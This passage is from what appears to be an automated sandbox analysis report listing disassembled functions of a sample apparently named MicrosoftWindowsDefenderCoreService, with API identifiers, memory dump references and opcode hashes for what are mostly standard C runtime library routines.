                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$p$p
                                                                                                      • API String ID: 3215553584-1995029353
                                                                                                      • Opcode ID: e082a461071b6da24f3492d34e17e8e84d0aafa2cd8011b319846d8f4dadc02c
                                                                                                      • Instruction ID: 6072494060513f57803dcf91a8d8a56fd2d9a1437cc911a0cb38f9fc09d8edc4
                                                                                                      • Opcode Fuzzy Hash: e082a461071b6da24f3492d34e17e8e84d0aafa2cd8011b319846d8f4dadc02c
                                                                                                      • Instruction Fuzzy Hash: EF1286E2F0C143C6FB187A19B1542B9F6A2EB41750FD84035E69A47EC4DB7CE848A738
                                                                                                      Function 00007FF76E1A709C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: e95652fa3470eead33a2fc63796d06924de8eb24e60a75e7e39f100f9d82b40c
                                                                                                      • Instruction ID: 6d0b9d9022216e9232062301adc8cdbc984759ebbcc06335d608021772fe7606
                                                                                                      • Opcode Fuzzy Hash: e95652fa3470eead33a2fc63796d06924de8eb24e60a75e7e39f100f9d82b40c
                                                                                                      • Instruction Fuzzy Hash: 35C10822A0C786C1E7196B59B4002BDFB95EF80B80FD50136DA4D03BD9DE7CEA55A738
                                                                                                      Function 00007FF76E195C1C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: a5a05adb5d86b50c8c6e6eed927ac3269ff3a31544a40d678027116eb92af1ea
                                                                                                      • Instruction ID: 956cac2c3ce7bbcf605a1f31a7943bd8572af9569c355af3b8bab530d91c1139
                                                                                                      • Opcode Fuzzy Hash: a5a05adb5d86b50c8c6e6eed927ac3269ff3a31544a40d678027116eb92af1ea
                                                                                                      • Instruction Fuzzy Hash: 5131C521B1A642C1EE19FB12B404579A3D5BF04BA1FD90535DD1D17790EF3CE8449738
                                                                                                      Function 00007FF76E1A1DF0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: b14d8a1ba4c2739b1ba6a8f68ca97d09823e0a80f273db79ccf80c90ace84012
                                                                                                      • Instruction ID: f31014199ecf68acca96ee61937886a509d5e0345af87e4b08f9de6fc53529c9
                                                                                                      • Opcode Fuzzy Hash: b14d8a1ba4c2739b1ba6a8f68ca97d09823e0a80f273db79ccf80c90ace84012
                                                                                                      • Instruction Fuzzy Hash: 96216D20F0C212C2FA6E772AB65513DE2526F44BB0FC40B34D97E47ED6DE2CA445A678
                                                                                                      Function 00007FF76E1B297C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: 62d9b5d24e4fb6abcbada70e0530243db7f6cfeb5a7f27f68214560e5305eba5
                                                                                                      • Instruction ID: 289697c9d42363896a44eee234fc565b559764adb9ab81bb80ef704e99c53c7a
                                                                                                      • Opcode Fuzzy Hash: 62d9b5d24e4fb6abcbada70e0530243db7f6cfeb5a7f27f68214560e5305eba5
                                                                                                      • Instruction Fuzzy Hash: C611BE21A18A41C6E754AB12F854329F2A0FB89FE4F804235EA9D83BD4DF7CD444D768
                                                                                                      Function 00007FF76E190274 Relevance: 9.2, APIs: 6, Instructions: 206COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 2829165498-0
                                                                                                      • Opcode ID: 0fd29cbb7af6d76dae49e4a1d0baa518f45d08b5763d85ee9fde59cd8831a8bc
                                                                                                      • Instruction ID: d328ba5e6180da20ac6f5ea569ee3b2f7f0465e5455f95aa72d888344aba3b1a
                                                                                                      • Opcode Fuzzy Hash: 0fd29cbb7af6d76dae49e4a1d0baa518f45d08b5763d85ee9fde59cd8831a8bc
                                                                                                      • Instruction Fuzzy Hash: 0D819272A08741C6EB28AF25B440269B3E6FF44BA4F940635EA5D47BD8EF3CD8409734
                                                                                                      Function 00007FF76E18DE00 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
                                                                                                      • Opcode ID: f70f61bac27a082725c3e5468bdb31bd3bcc1b36a288abbb61d2fcafcbecc5c5
                                                                                                      • Instruction ID: d28cf4b10d440a7496bd3101de7ec544d33e3e2c370faf25c0210c55d77b1573
                                                                                                      • Opcode Fuzzy Hash: f70f61bac27a082725c3e5468bdb31bd3bcc1b36a288abbb61d2fcafcbecc5c5
                                                                                                      • Instruction Fuzzy Hash: FB315621A08B05C5EA19BB15F8401BAB364FB94B98FD80632DA5D437A5DF3CE441DB39
                                                                                                      Function 00007FF76E18D960 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeLocinfo::_Locinfo_ctorRegister
                                                                                                      • String ID:
                                                                                                      • API String ID: 2324539378-0
                                                                                                      • Opcode ID: 5ba330be2dbbb8b3f6702c6a6d1631c6be94a71e4c76cdf28269f1f4d6e0dc4d
                                                                                                      • Instruction ID: 91b5d79d2e450212b779f1dbe5be274c59541314754fb4d637f3fbd45e54d6f7
                                                                                                      • Opcode Fuzzy Hash: 5ba330be2dbbb8b3f6702c6a6d1631c6be94a71e4c76cdf28269f1f4d6e0dc4d
                                                                                                      • Instruction Fuzzy Hash: 2D316422A0CB41C5EA29BB15F44017AB364FB88B94FD80132DA5E873A5DE3CE445DB39
                                                                                                      Function 00007FF76E1937AC Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 3523768491-393685449
                                                                                                      • Opcode ID: f5169c4f56f61db07aea03b59a458c5f8c9868908afcd53ad126c0150c097e91
                                                                                                      • Instruction ID: ce125ae3f783afecaac464a4ff437510b50bd8d049edb9e366a6e3a43cba3165
                                                                                                      • Opcode Fuzzy Hash: f5169c4f56f61db07aea03b59a458c5f8c9868908afcd53ad126c0150c097e91
                                                                                                      • Instruction Fuzzy Hash: 27E1D332908782CAE718AF74E4843ADB7A2FB44748F944135DE8D57696CF38E982D734
                                                                                                      Function 00007FF76E1A1F68 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32 ref: 00007FF76E1A1F77
                                                                                                      • FlsSetValue.KERNEL32(?,?,0000D3F9CE523F0D,00007FF76E19D365,?,?,?,?,00007FF76E1A95BA,?,?,00000000,00007FF76E1AE55B,?,?,?), ref: 00007FF76E1A1FAD
                                                                                                      • FlsSetValue.KERNEL32(?,?,0000D3F9CE523F0D,00007FF76E19D365,?,?,?,?,00007FF76E1A95BA,?,?,00000000,00007FF76E1AE55B,?,?,?), ref: 00007FF76E1A1FDA
                                                                                                      • FlsSetValue.KERNEL32(?,?,0000D3F9CE523F0D,00007FF76E19D365,?,?,?,?,00007FF76E1A95BA,?,?,00000000,00007FF76E1AE55B,?,?,?), ref: 00007FF76E1A1FEB
                                                                                                      • FlsSetValue.KERNEL32(?,?,0000D3F9CE523F0D,00007FF76E19D365,?,?,?,?,00007FF76E1A95BA,?,?,00000000,00007FF76E1AE55B,?,?,?), ref: 00007FF76E1A1FFC
                                                                                                      • SetLastError.KERNEL32 ref: 00007FF76E1A2017
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: a2daba614819bf553a6c31a2763aabdaf180dc8d53e8e840be4aaf8f075131df
                                                                                                      • Instruction ID: d06a21cb30d652915f82647220eabfe4ebbcf9b1f3f30b32db91a9da9d87b491
                                                                                                      • Opcode Fuzzy Hash: a2daba614819bf553a6c31a2763aabdaf180dc8d53e8e840be4aaf8f075131df
                                                                                                      • Instruction Fuzzy Hash: CA115C20B0C252C2FA6C772A765107DE1526F48BB0F940734E97E47FD6DE2CA445E678
                                                                                                      Function 00007FF76E181C20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                      • Opcode ID: dfc1825e89eee14596a70879a8abb65736ceb11984c2e4ac4046aaa8f830b525
                                                                                                      • Instruction ID: 5fa868d1bf23078872b38190362d4243c6a03804a001937480df2520f634936c
                                                                                                      • Opcode Fuzzy Hash: dfc1825e89eee14596a70879a8abb65736ceb11984c2e4ac4046aaa8f830b525
                                                                                                      • Instruction Fuzzy Hash: 0541AE22B09B41C9FB18EBB0E4502BD7361AF44748F944534DE4D23A99CF38D51AA379
                                                                                                      Function 00007FF76E19ED14 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: a6a2257ccce73abb0b5de8b17e2571786f334c575c5a99e5c4bf9468e7371670
                                                                                                      • Instruction ID: c0796b405520ae11584e925d78497ff6bd80e9c146a6ac0673af78568d185767
                                                                                                      • Opcode Fuzzy Hash: a6a2257ccce73abb0b5de8b17e2571786f334c575c5a99e5c4bf9468e7371670
                                                                                                      • Instruction Fuzzy Hash: 4AF0C261A08A02C1EA2CAB20F454379A3A1FF48B60F801336DAAE065F4CF2DD544E338
                                                                                                      Function 00007FF76E192BAC Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1740715915-0
                                                                                                      • Opcode ID: 50badd6584c0e704502cbde6b854f5239cc82cee7ff32e6050982a3aefd23c99
                                                                                                      • Instruction ID: 74260ca46ae402d16014349469799deab97a92240db1e058103bf721863caaca
                                                                                                      • Opcode Fuzzy Hash: 50badd6584c0e704502cbde6b854f5239cc82cee7ff32e6050982a3aefd23c99
                                                                                                      • Instruction Fuzzy Hash: 77B18122A0A646C1EA6DFF11B58067DE2D6AF44B84F898435DE4D07795DE3CEC42E338
                                                                                                      Function 00007FF76E181680 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1087005451-0
                                                                                                      • Opcode ID: 02996f24eed811a7ae1eb20188cd5df9c91460e270f6fb6400a3a26fa3e2ad52
                                                                                                      • Instruction ID: 2da90f6e5f93c8dd070a3119dfe2c59007bff85c45226f72d8abb366710a028a
                                                                                                      • Opcode Fuzzy Hash: 02996f24eed811a7ae1eb20188cd5df9c91460e270f6fb6400a3a26fa3e2ad52
                                                                                                      • Instruction Fuzzy Hash: 5281E523F18B41C9FB14ABA4F4003ED7362AB44798F804236DE6D16BD6EE38A085D364
                                                                                                      Function 00007FF76E1B3D98 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: 610bebcc449b3f19ed658dd1d6eba545d4d7d9ef53352e00cb8a10db8b486460
                                                                                                      • Instruction ID: 5852d78f67fec066dab4f8e686d78829a8e9ff6e4cacac7fe679f970f9be9487
                                                                                                      • Opcode Fuzzy Hash: 610bebcc449b3f19ed658dd1d6eba545d4d7d9ef53352e00cb8a10db8b486460
                                                                                                      • Instruction Fuzzy Hash: 7411B662D18A0386F75C3178F85A37584406F64370EC40636F9AE866D7CE9CA5536138
                                                                                                      Function 00007FF76E1A2030 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF76E19C087,?,?,00000000,00007FF76E19C322,?,?,?,?,?,00007FF76E19C2AE), ref: 00007FF76E1A204F
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76E19C087,?,?,00000000,00007FF76E19C322,?,?,?,?,?,00007FF76E19C2AE), ref: 00007FF76E1A206E
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76E19C087,?,?,00000000,00007FF76E19C322,?,?,?,?,?,00007FF76E19C2AE), ref: 00007FF76E1A2096
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76E19C087,?,?,00000000,00007FF76E19C322,?,?,?,?,?,00007FF76E19C2AE), ref: 00007FF76E1A20A7
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF76E19C087,?,?,00000000,00007FF76E19C322,?,?,?,?,?,00007FF76E19C2AE), ref: 00007FF76E1A20B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
